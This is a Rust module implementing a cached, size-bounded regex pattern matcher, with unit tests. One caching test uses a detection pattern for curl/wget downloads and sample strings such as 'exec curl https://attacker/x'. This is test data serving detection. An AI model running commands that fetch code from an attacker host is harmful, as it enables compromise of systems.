use crate::ports::{Captures, CompiledPattern, PatternError, PatternMatch, PatternMatcher};
use regex::{Regex, RegexBuilder};
use std::collections::HashMap;
use std::sync::{Arc, Mutex};
const REGEX_NFA_SIZE_LIMIT: usize = 8 * (1 << 20);
const REGEX_DFA_SIZE_LIMIT: usize = 8 * (1 << 20);
fn build_bounded_regex(pattern: &str) -> Result<Regex, regex::Error> {
RegexBuilder::new(pattern)
.size_limit(REGEX_NFA_SIZE_LIMIT)
.dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
.build()
}
#[derive(Debug, Default, Clone)]
pub struct RegexPatternMatcher {
cache: Arc<Mutex<HashMap<String, Arc<Regex>>>>,
}
impl RegexPatternMatcher {
#[must_use]
pub fn new() -> Self {
Self::default()
}
fn cached(&self, pattern: &str) -> Option<Arc<Regex>> {
let recover_poison = |e: std::sync::PoisonError<_>| e.into_inner();
if let Some(re) = self
.cache
.lock()
.unwrap_or_else(recover_poison)
.get(pattern)
{
return Some(Arc::clone(re));
}
let re = match build_bounded_regex(pattern) {
Ok(re) => Arc::new(re),
Err(e) => {
tracing::warn!("Invalid or oversized regex pattern '{pattern}': {e}");
return None;
}
};
Some(Arc::clone(
self.cache
.lock()
.unwrap_or_else(recover_poison)
.entry(pattern.to_string())
.or_insert_with(|| Arc::clone(&re)),
))
}
}
fn match_to_pattern(m: regex::Match<'_>) -> PatternMatch {
PatternMatch {
start: m.start(),
end: m.end(),
matched_text: m.as_str().to_string(),
}
}
fn captures_to_groups(caps: ®ex::Captures<'_>) -> Captures {
let groups = caps
.iter()
.map(|opt| opt.map(match_to_pattern))
.collect::<Vec<_>>();
Captures::new(groups)
}
impl PatternMatcher for RegexPatternMatcher {
fn find_matches(&self, pattern: &str, text: &str) -> Vec<PatternMatch> {
match self.cached(pattern) {
Some(re) => re.find_iter(text).map(match_to_pattern).collect(),
None => Vec::new(),
}
}
fn is_match(&self, pattern: &str, text: &str) -> bool {
match self.cached(pattern) {
Some(re) => re.is_match(text),
None => false,
}
}
fn captures_iter(&self, pattern: &str, text: &str) -> Vec<Captures> {
match self.cached(pattern) {
Some(re) => re
.captures_iter(text)
.map(|c| captures_to_groups(&c))
.collect(),
None => Vec::new(),
}
}
fn compile(&self, pattern: &str) -> Result<CompiledPattern, PatternError> {
let re = Arc::new(
build_bounded_regex(pattern)
.map_err(|e| PatternError::InvalidPattern(e.to_string()))?,
);
let re_find = Arc::clone(&re);
let re_is_match = Arc::clone(&re);
let re_captures = re;
Ok(CompiledPattern::new(
Box::new(move |text: &str| re_find.find_iter(text).map(match_to_pattern).collect()),
Box::new(move |text: &str| re_is_match.is_match(text)),
Box::new(move |text: &str| {
re_captures
.captures_iter(text)
.map(|c| captures_to_groups(&c))
.collect()
}),
))
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn find_matches_returns_every_hit_in_source_order() {
let matcher = RegexPatternMatcher::new();
let matches = matcher.find_matches(r"\d+", "abc 123 def 456");
assert_eq!(matches.len(), 2);
assert_eq!(matches[0].matched_text, "123");
assert_eq!(matches[1].matched_text, "456");
}
#[test]
fn find_matches_returns_empty_when_pattern_absent() {
let matcher = RegexPatternMatcher::new();
let matches = matcher.find_matches(r"\d+", "no numbers here");
assert!(matches.is_empty());
}
#[test]
fn compile_shares_state_across_three_operations() {
let matcher = RegexPatternMatcher::new();
let compiled = matcher.compile(r"hello\s+world").unwrap();
let matches = compiled.find_matches("say hello world!");
assert_eq!(matches.len(), 1);
assert_eq!(matches[0].matched_text, "hello world");
assert!(compiled.is_match("say hello world!"));
assert!(!compiled.is_match("say goodbye"));
let caps = compiled.captures_iter("say hello world!");
assert_eq!(caps.len(), 1);
assert_eq!(caps[0].get(0).unwrap().matched_text, "hello world");
}
#[test]
fn compile_returns_err_for_invalid_regex_syntax() {
let matcher = RegexPatternMatcher::new();
let result = matcher.compile(r"[invalid");
assert!(result.is_err());
}
#[test]
fn repeated_calls_with_same_pattern_use_cached_regex() {
let matcher = RegexPatternMatcher::new();
let pattern = r"\b(curl|wget)\b\s+https?://";
for _ in 0..16 {
matcher.find_matches(pattern, "run curl https://example.com/install.sh");
matcher.is_match(pattern, "fetch wget https://example.com/x");
matcher.captures_iter(pattern, "exec curl https://attacker/x");
}
let cache = matcher.cache.lock().expect("cache mutex poisoned");
assert_eq!(
cache.len(),
1,
"trait methods must reuse one cached compile per pattern; got {} entries",
cache.len()
);
assert!(cache.contains_key(pattern));
}
#[test]
fn cache_keys_each_unique_pattern_separately() {
let matcher = RegexPatternMatcher::new();
matcher.find_matches(r"\d+", "a 1 b");
matcher.find_matches(r"[a-z]+", "abc");
matcher.find_matches(r"\d+", "c 2 d");
let cache = matcher.cache.lock().expect("cache mutex poisoned");
assert_eq!(
cache.len(),
2,
"two distinct patterns must produce two cache entries; got {} entries",
cache.len()
);
}
#[test]
fn compile_rejects_oversized_patterns() {
let matcher = RegexPatternMatcher::new();
let pathological = "a{1000000}{2}";
let result = matcher.compile(pathological);
assert!(
result.is_err(),
"compile MUST reject oversized regexes via size_limit"
);
assert!(matcher.find_matches(pathological, "aaa").is_empty());
assert!(!matcher.is_match(pathological, "aaa"));
}
#[test]
fn is_match_and_captures_agree_with_find_matches() {
let matcher = RegexPatternMatcher::new();
let text = "user@example.com talks to admin@example.com";
let pattern = r"(\w+)@example\.com";
assert!(matcher.is_match(pattern, text));
assert_eq!(matcher.find_matches(pattern, text).len(), 2);
let caps = matcher.captures_iter(pattern, text);
assert_eq!(caps.len(), 2);
assert_eq!(caps[0].get(1).unwrap().matched_text, "user");
assert_eq!(caps[1].get(1).unwrap().matched_text, "admin");
}
#[test]
fn cached_recovers_from_poisoned_mutex() {
let matcher = RegexPatternMatcher::new();
matcher.find_matches(r"\d+", "abc 123");
assert_eq!(
matcher
.cache
.lock()
.expect("cache should be healthy after warm-up")
.len(),
1,
"one pattern should be cached after first lookup"
);
let cache_clone = Arc::clone(&matcher.cache);
let result = std::panic::catch_unwind(std::panic::AssertUnwindSafe(|| {
let _guard = cache_clone.lock().expect("lock before poison");
panic!("intentional test panic to poison mutex");
}));
assert!(result.is_err(), "inner panic should have propagated");
assert!(
matcher.cache.is_poisoned(),
"mutex must be poisoned after a panic while holding it"
);
let matches = matcher.find_matches(r"\d+", "xyz 456");
assert_eq!(matches.len(), 1, "cached must recover from poison");
assert_eq!(matches[0].matched_text, "456");
let alpha_matches = matcher.find_matches(r"[a-z]+", "abc");
assert_eq!(alpha_matches.len(), 1);
assert_eq!(alpha_matches[0].matched_text, "abc");
}
}